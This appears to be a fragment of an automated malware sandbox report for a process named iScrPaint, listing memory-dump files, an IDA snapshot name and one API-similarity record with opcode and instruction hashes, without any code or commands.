                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365762036.000000006B250000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B251000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B293000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B2B2000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B2E9000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B30F000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B344000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B367000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B388000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B3B7000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B410000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B45A000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B480000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B486000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B488000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B48E000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B4B4000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B4B7000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B4DB000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B4E0000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B4E8000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B4EA000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B4ED000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B4F9000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B4FC000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B4FE000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B53D000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B55F000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B5BD000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B5CF000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B5D9000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B5DF000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B5F8000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B601000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B604000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B63A000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B646000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B66E000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B673000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B675000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B725000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B727000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B72F000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2365800662.000000006B73B000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B7A7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B7A9000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B7B0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B7CC000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B803000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B807000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B848000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B84F000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B852000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B85F000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B867000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B898000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B8A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B8DB000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B8DD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B8E0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B8EA000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B8F7000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2395944422.000000006B906000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2401973756.000000006B968000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2402074341.000000006B96D000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2402180949.000000006B96F000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2402655383.000000006B97A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2402721546.000000006B97C000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2403303591.000000006B992000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2403377360.000000006B997000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000011.00000002.2403461714.000000006B99A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_6b250000_iScrPaint.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                                                                                                                • Opcode ID: edca91c8b1b166bbb65cd5f3d821f7b5d27d6a7a586edcc79482bdd182939356
                                                                                                                                                                                                                                                • Instruction ID: c2fefe02435bb78dd5c68b17df432acacb780ee60e809a22bca201a87340cbc6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: edca91c8b1b166bbb65cd5f3d821f7b5d27d6a7a586edcc79482bdd182939356
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 522107B490A304EFCF85EF25D545A483BF4BB0A314F09547AE40987A54DBBCCA82CF59